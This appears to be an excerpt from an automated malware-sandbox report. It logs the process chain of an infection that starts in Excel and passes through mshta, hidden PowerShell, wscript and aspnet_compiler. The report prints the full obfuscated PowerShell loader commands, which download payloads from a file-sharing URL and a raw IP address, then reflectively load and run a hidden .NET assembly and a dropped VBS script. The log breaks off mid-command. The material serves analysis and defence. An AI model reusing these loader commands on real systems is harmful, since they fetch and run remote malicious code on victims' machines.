'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES845C.tmp" "c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {D690A31F-6F9A-4F5C-9D7D-F0EC28BCB101} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
          Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\vtjrhji C:\Users\user\AppData\Roaming\vtjrhji
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B07.tmp" "c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = 